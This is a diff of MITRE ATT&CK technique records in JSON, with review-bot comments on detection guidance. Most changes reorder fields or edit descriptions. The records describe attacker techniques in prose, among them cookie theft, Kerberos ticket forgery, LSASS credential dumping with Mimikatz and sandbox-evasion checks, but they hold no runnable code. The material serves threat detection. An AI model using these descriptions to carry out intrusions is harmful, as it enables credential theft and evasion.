+ "x_mitre_data_sources": [
+ "File monitoring",
+ "API monitoring"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)",
+ "Johann Rehberger"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows",
"Office 365",
"SaaS"
- ],
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)",
- "Johann Rehberger"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "File monitoring",
- "API monitoring"
- ],
- "x_mitre_detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory."
+ ]
},
{
"external_references": [
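Review bot: The new-side `x_mitre_detection` for Steal Web Session Cookie covers only local cookie stores and browser memory, yet the description cites Evilginx 2 and Muraena, which capture cookies at a man-in-the-middle proxy where typically no local file or browser-memory access occurs on the victim endpoint. Consider adding a sentence such as `Proxy-based theft leaves no endpoint artifact; correlate authentication logs for sessions originating from unexpected IP addresses or user agents shortly after a phishing link is visited.` The data sources (`File monitoring`, `API monitoring`) would then also need an authentication-log source to match the `Office 365` and `SaaS` platforms listed in the same object.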
@@ -25565,18 +26463,18 @@
],
"modified": "2020-03-31T12:59:11.121Z",
"created": "2020-02-11T19:12:46.830Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_system_requirements": [
+ "Kerberos authentication enabled"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
"x_mitre_data_sources": [
"Windows event logs",
"Authentication logs"
],
- "x_mitre_system_requirements": [
- "Kerberos authentication enabled"
+ "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -25602,7 +26500,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Steganography",
- "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was one of the first known and reported adversaries that used steganography with\u202fInvoke-PSImage. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used\u202fInvoke-PSImage\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ",
+ "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used\u202fInvoke-PSImage\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ",
"id": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -25611,19 +26509,19 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T20:56:07.825Z",
+ "modified": "2020-06-08T18:16:48.253Z",
"created": "2020-02-05T14:28:16.719Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.",
+ "x_mitre_data_sources": [
+ "Binary file metadata"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_data_sources": [
- "Binary file metadata"
- ],
- "x_mitre_detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
"external_references": [
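Review bot: The moved `x_mitre_detection` on the new side contains a typo: "Look for strings are other signatures" should read `Look for strings or other signatures left in system artifacts related to decoding steganography.` The commit already reworks the description (dropping the Invoke-PSImage attribution for Duqu), so this field is a natural candidate to fix in the same pass. Note also that the only data source is `Binary file metadata`, while the detection text points at decoding artifacts on the system, which file or process monitoring would cover more directly; worth confirming against the intended data-source mapping.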
@@ -25654,20 +26552,20 @@
],
"modified": "2020-03-15T00:37:58.963Z",
"created": "2020-03-15T00:37:58.963Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92",
@@ -25728,27 +26626,27 @@
],
"modified": "2020-03-02T15:17:40.505Z",
"created": "2020-03-02T14:22:24.410Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "File monitoring",
- "Application logs"
- ],
- "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.",
- "x_mitre_impact_type": [
- "Integrity"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root",
"SYSTEM"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Application logs"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"revoked": false,
@@ -25793,20 +26691,13 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-31T12:49:36.781Z",
+ "modified": "2020-06-20T22:42:26.314Z",
"created": "2020-02-05T14:54:07.588Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Anti-virus",
- "Autoruns Analysis",
- "Digital Certificate Validation",
- "Process whitelisting",
- "User Mode Signature Validation",
- "Windows User Account Control"
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
],
- "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ",
"x_mitre_data_sources": [
"Binary file metadata",
"File monitoring",
@@ -25819,11 +26710,18 @@
"Windows Registry",
"Windows event logs"
],
- "x_mitre_platforms": [
- "Windows",
- "macOS",
- "Linux"
- ]
+ "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ",
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus",
+ "Autoruns Analysis",
+ "Digital Certificate Validation",
+ "Process whitelisting",
+ "User Mode Signature Validation",
+ "Windows User Account Control"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--9e80ddfb-ce32-4961-a778-ca6a10cfae72",
@@ -25913,23 +26811,23 @@
],
"modified": "2020-03-27T01:03:26.306Z",
"created": "2020-01-30T14:34:44.992Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "root"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_effective_permissions": [
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"object_marking_refs": [
@@ -26005,21 +26903,21 @@
],
"modified": "2020-03-23T12:51:45.574Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_contributors": [
- "Veeral Patel"
+ "x_mitre_version": "1.2",
+ "x_mitre_data_sources": [
+ "Web proxy",
+ "File monitoring"
],
+ "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.",
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
- "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.",
- "x_mitre_data_sources": [
- "Web proxy",
- "File monitoring"
+ "x_mitre_contributors": [
+ "Veeral Patel"
],
- "x_mitre_version": "1.2"
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -26050,11 +26948,9 @@
],
"modified": "2020-03-26T21:25:37.306Z",
"created": "2020-03-16T15:45:17.032Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"SSL/TLS inspection",
"Process monitoring",
@@ -26063,11 +26959,20 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ]
},
{
+ "id": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nSpecific checks may will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
+ "name": "System Checks",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -26085,21 +26990,18 @@
"source_name": "Unit 42 OilRig Sept 2018"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "System Checks",
- "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nSpecific checks may will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
- "id": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
"type": "attack-pattern",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
}
],
- "modified": "2020-03-27T14:20:15.370Z",
+ "modified": "2020-07-01T16:32:02.514Z",
"created": "2020-03-06T20:57:37.959Z",
"x_mitre_platforms": [
"Linux",
@@ -26254,37 +27156,48 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-23T23:50:48.027Z",
+ "modified": "2020-05-19T21:22:37.865Z",
"created": "2019-12-19T19:43:34.507Z",
- "x_mitre_defense_bypassed": [
- "Host intrusion prevention systems",
- "Anti-virus",
- "File monitoring"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Jean-Ian Boutin, ESET",
+ "McAfee",
+ "Ryan Becwar"
],
- "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)",
"x_mitre_data_sources": [
"EFI",
"BIOS",
"API monitoring"
],
- "x_mitre_contributors": [
- "McAfee",
- "Ryan Becwar"
+ "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_defense_bypassed": [
+ "Host intrusion prevention systems",
+ "Anti-virus",
+ "File monitoring"
]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:31:04.307Z",
+ "modified": "2020-03-26T18:17:42.298Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "System Information Discovery",
+ "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -26312,19 +27225,9 @@
"source_name": "Microsoft Virutal Machine API"
}
],
- "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)",
- "name": "System Information Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T18:17:42.298Z",
- "created": "2017-05-31T21:31:04.307Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -26379,21 +27282,21 @@
],
"modified": "2020-03-15T00:55:33.136Z",
"created": "2017-05-31T21:30:27.342Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.2"
},
{
"object_marking_refs": [
@@ -26434,6 +27337,20 @@
],
"modified": "2020-03-15T14:15:32.910Z",
"created": "2017-05-31T21:30:45.139Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_version": "2.1",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -26441,26 +27358,22 @@
"AWS",
"GCP",
"Azure"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_is_subtechnique": false
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:35.733Z",
+ "modified": "2020-03-15T01:03:47.866Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "System Owner/User Discovery",
+ "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nUtilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -26473,19 +27386,9 @@
"url": "https://capec.mitre.org/data/definitions/577.html"
}
],
